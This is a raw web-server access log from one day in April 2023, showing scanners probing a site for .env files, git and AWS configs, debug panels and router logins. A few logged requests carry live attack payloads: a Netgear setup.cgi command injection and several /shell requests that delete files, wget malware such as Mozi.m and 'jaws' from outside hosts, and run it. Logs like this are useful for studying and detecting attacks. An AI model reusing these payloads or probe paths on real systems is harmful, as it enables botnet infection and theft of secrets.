185.202.172.185 - - [14/Apr/2023:08:54:54 +0000] "POST / HTTP/1.1" 405 409762 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
192.241.198.19 - - [14/Apr/2023:08:59:42 +0000] "GET /actuator/health HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x"
172.105.128.11 - - [14/Apr/2023:09:13:21 +0000] "\x16\x03\x01" 400 226 "-" "-"
107.170.243.15 - - [14/Apr/2023:09:18:05 +0000] "GET /hudson HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x"
135.125.244.48 - - [14/Apr/2023:09:52:06 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:09:52:06 +0000] "POST / HTTP/1.1" 405 409731 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
114.229.56.31 - - [14/Apr/2023:09:54:04 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://114.229.56.31:36768/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 200 - "-" "-"
135.125.244.48 - - [14/Apr/2023:10:17:30 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:10:17:30 +0000] "POST / HTTP/1.1" 405 409725 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [14/Apr/2023:10:27:30 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.225.74.42 - - [14/Apr/2023:10:39:07 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423613 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
47.254.255.160 - - [14/Apr/2023:10:44:48 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
47.254.255.160 - - [14/Apr/2023:10:44:49 +0000] "POST / HTTP/1.1" 405 409738 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.79.181.179 - - [14/Apr/2023:10:58:18 +0000] "\x16\x03\x01" 400 226 "-" "-"
54.255.174.5 - - [14/Apr/2023:11:04:55 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
54.255.174.5 - - [14/Apr/2023:11:04:56 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "python-requests/2.28.2"
54.255.174.5 - - [14/Apr/2023:11:04:57 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
54.255.174.5 - - [14/Apr/2023:11:04:57 +0000] "GET / HTTP/1.1" 200 8382 "-" "Python/3.10 aiohttp/3.8.3"
54.255.174.5 - - [14/Apr/2023:11:04:59 +0000] "GET /.DS_Store HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
54.255.174.5 - - [14/Apr/2023:11:05:00 +0000] "GET /.DS_Store HTTP/1.1" 200 - "-" "Python/3.10 aiohttp/3.8.3"
54.255.174.5 - - [14/Apr/2023:11:05:02 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
54.255.174.5 - - [14/Apr/2023:11:05:03 +0000] "POST /.env HTTP/1.1" 405 411969 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
54.255.174.5 - - [14/Apr/2023:11:07:29 +0000] "GET /frontend_dev.php/$ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
54.255.174.5 - - [14/Apr/2023:11:07:29 +0000] "GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
54.255.174.5 - - [14/Apr/2023:11:07:30 +0000] "GET /debug/default/view HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
54.255.174.5 - - [14/Apr/2023:11:07:31 +0000] "GET /debug/default/view.html HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
54.255.174.5 - - [14/Apr/2023:11:07:31 +0000] "GET /frontend/web/debug/default/view HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0"
54.255.174.5 - - [14/Apr/2023:11:07:32 +0000] "GET /debug/default/view?panel=config HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
54.255.174.5 - - [14/Apr/2023:11:07:33 +0000] "GET /sapi/debug/default/view HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
54.255.174.5 - - [14/Apr/2023:11:07:33 +0000] "GET /web/debug/default/view HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
54.255.174.5 - - [14/Apr/2023:11:07:34 +0000] "GET /aws.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
54.255.174.5 - - [14/Apr/2023:11:07:35 +0000] "GET /awsconfig.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
54.255.174.5 - - [14/Apr/2023:11:07:35 +0000] "GET /config.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
54.255.174.5 - - [14/Apr/2023:11:07:36 +0000] "GET /AwsConfig.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
54.255.174.5 - - [14/Apr/2023:11:07:37 +0000] "GET /_profiler/phpinfo HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
54.255.174.5 - - [14/Apr/2023:11:07:37 +0000] "GET /phpinfo.php HTTP/1.1" 200 23906 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
107.170.255.29 - - [14/Apr/2023:11:07:54 +0000] "GET /ReportServer HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x"
103.43.19.38 - - [14/Apr/2023:11:11:35 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.4997.0 Safari/537.36"
103.43.19.38 - - [14/Apr/2023:11:11:36 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Go-http-client/1.1"
43.154.128.189 - - [14/Apr/2023:11:47:43 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:12:01:34 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:12:01:34 +0000] "POST / HTTP/1.1" 405 409721 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
18.219.118.138 - - [14/Apr/2023:12:07:04 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
18.219.118.138 - - [14/Apr/2023:12:07:05 +0000] "POST / HTTP/1.1" 405 409751 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.195.241.126 - - [14/Apr/2023:12:18:17 +0000] "GET / HTTP/1.1" 200 8383 "-" "python-requests/2.28.2"
34.174.166.45 - - [14/Apr/2023:12:37:47 +0000] "GET / HTTP/1.1" 200 8382 "-" "python-requests/2.28.1"
34.174.166.45 - - [14/Apr/2023:12:37:48 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
34.174.166.45 - - [14/Apr/2023:12:37:49 +0000] "POST / HTTP/1.1" 405 409810 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
34.174.166.45 - - [14/Apr/2023:12:37:53 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 405 413636 "-" "python-requests/2.28.1"
185.254.196.173 - - [14/Apr/2023:12:53:22 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [14/Apr/2023:12:53:22 +0000] "POST / HTTP/1.1" 405 409690 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [14/Apr/2023:13:07:00 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:13:14:09 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:13:14:10 +0000] "POST / HTTP/1.1" 405 409727 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
128.1.248.26 - - [14/Apr/2023:13:29:17 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
198.235.24.6 - - [14/Apr/2023:14:14:55 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [14/Apr/2023:14:29:02 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
123.145.3.18 - - [14/Apr/2023:15:08:25 +0000] "GET / HTTP/1.0" 200 41226 "-" "-"
124.235.138.61 - - [14/Apr/2023:15:09:04 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
139.170.203.35 - - [14/Apr/2023:15:09:06 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
45.79.181.223 - - [14/Apr/2023:15:15:00 +0000] "\x16\x03\x01" 400 226 "-" "-"
185.254.196.173 - - [14/Apr/2023:15:46:00 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [14/Apr/2023:15:46:00 +0000] "POST / HTTP/1.1" 405 409720 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [14/Apr/2023:15:53:10 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:16:03:41 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:16:03:41 +0000] "POST / HTTP/1.1" 405 409663 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
162.142.125.14 - - [14/Apr/2023:16:04:09 +0000] "GET / HTTP/1.1" 200 8379 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.14 - - [14/Apr/2023:16:04:21 +0000] "PRI * HTTP/2.0" 400 226 "-" "-"
162.142.125.14 - - [14/Apr/2023:16:04:21 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.14 - - [14/Apr/2023:16:04:22 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.14 - - [14/Apr/2023:16:04:22 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
149.18.73.52 - - [14/Apr/2023:16:14:13 +0000] "GET / HTTP/1.1" 200 41226 "-" "libwww-perl/6.05"
45.79.181.223 - - [14/Apr/2023:16:52:37 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.244.48 - - [14/Apr/2023:16:55:30 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:16:55:30 +0000] "POST / HTTP/1.1" 405 409711 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
94.102.61.10 - - [14/Apr/2023:17:31:24 +0000] "GET / HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
134.122.135.59 - - [14/Apr/2023:17:38:54 +0000] "GET /voddetail/47649.html HTTP/1.1" 200 - "/voddetail/47649.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
167.94.138.34 - - [14/Apr/2023:17:43:36 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
167.94.138.34 - - [14/Apr/2023:17:43:37 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.34 - - [14/Apr/2023:17:43:38 +0000] "PRI * HTTP/2.0" 400 226 "-" "-"
167.94.138.34 - - [14/Apr/2023:17:43:38 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.34 - - [14/Apr/2023:17:43:39 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.34 - - [14/Apr/2023:17:43:39 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
94.102.61.10 - - [14/Apr/2023:17:47:14 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "python-requests/2.26.0"
94.102.61.10 - - [14/Apr/2023:17:47:14 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "python-requests/2.26.0"
94.102.61.10 - - [14/Apr/2023:17:47:15 +0000] "GET / HTTP/1.1" 200 8380 "-" "python-requests/2.26.0"
135.125.244.48 - - [14/Apr/2023:18:23:00 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:18:23:00 +0000] "POST / HTTP/1.1" 405 409717 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.11.216.14 - - [14/Apr/2023:18:33:07 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
43.154.128.189 - - [14/Apr/2023:18:34:52 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [14/Apr/2023:19:01:16 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [14/Apr/2023:19:01:17 +0000] "POST / HTTP/1.1" 405 409706 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:19:16:11 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:19:16:12 +0000] "POST / HTTP/1.1" 405 409709 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
128.1.248.26 - - [14/Apr/2023:19:27:38 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
43.154.128.189 - - [14/Apr/2023:19:53:27 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
212.8.104.247 - - [14/Apr/2023:20:03:59 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
117.194.172.238 - - [14/Apr/2023:20:30:35 +0000] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 200 - "-" "-"
172.104.11.4 - - [14/Apr/2023:20:59:42 +0000] "\x16\x03\x01" 400 226 "-" "-"
193.32.162.159 - - [14/Apr/2023:21:02:00 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.244.48 - - [14/Apr/2023:21:05:48 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [14/Apr/2023:21:05:49 +0000] "POST / HTTP/1.1" 405 409757 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [14/Apr/2023:21:11:40 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
87.236.176.204 - - [14/Apr/2023:21:21:17 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
87.236.176.250 - - [14/Apr/2023:21:21:18 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
87.236.176.36 - - [14/Apr/2023:21:21:18 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
58.56.206.166 - - [14/Apr/2023:21:22:25 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
60.221.41.51 - - [14/Apr/2023:21:22:30 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
123.160.237.18 - - [14/Apr/2023:21:22:33 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
193.32.162.159 - - [14/Apr/2023:22:11:13 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [14/Apr/2023:22:30:52 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
205.210.31.30 - - [14/Apr/2023:22:48:56 +0000] "GET / HTTP/1.1" 200 41226 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
159.65.121.207 - - [14/Apr/2023:22:50:39 +0000] "\x16\x03\x01" 400 226 "-" "-"
159.65.121.207 - - [14/Apr/2023:22:50:39 +0000] "\x16\x03\x01" 400 226 "-" "-"
159.65.121.207 - - [14/Apr/2023:22:50:39 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.65.121.207 - - [14/Apr/2023:22:50:40 +0000] "GET /client/get_targets HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.65.121.207 - - [14/Apr/2023:22:50:40 +0000] "GET /upl.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
159.65.121.207 - - [14/Apr/2023:22:50:41 +0000] "\x16\x03\x01" 400 226 "-" "-"
159.65.121.207 - - [14/Apr/2023:22:50:41 +0000] "GET /geoip/ HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.65.121.207 - - [14/Apr/2023:22:50:42 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
159.65.121.207 - - [14/Apr/2023:22:50:42 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.79.181.104 - - [14/Apr/2023:22:54:22 +0000] "\x16\x03\x01" 400 226 "-" "-"
198.235.24.155 - - [14/Apr/2023:22:57:36 +0000] "\x16\x03\x01" 400 226 "-" "-"
51.120.5.218 - - [14/Apr/2023:23:21:04 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.120.5.218 - - [14/Apr/2023:23:21:04 +0000] "POST / HTTP/1.1" 405 409711 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
198.235.24.80 - - [14/Apr/2023:23:34:05 +0000] "GET / HTTP/1.0" 200 41463 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
20.234.111.129 - - [14/Apr/2023:23:37:01 +0000] "GET /_profiler/phpinfo HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:23:37:02 +0000] "POST / HTTP/1.1" 405 408781 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:23:37:03 +0000] "POST /debug/default/view?panel=config HTTP/1.1" 405 413124 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:23:37:04 +0000] "POST /tool/view/phpinfo.view.php HTTP/1.1" 405 412367 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:23:37:05 +0000] "POST /wp-config.php-backup HTTP/1.1" 405 412013 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:23:37:07 +0000] "POST /%C0 HTTP/1.1" 404 1007 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [14/Apr/2023:23:37:07 +0000] "POST /debug/default/view.html HTTP/1.1" 405 412173 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
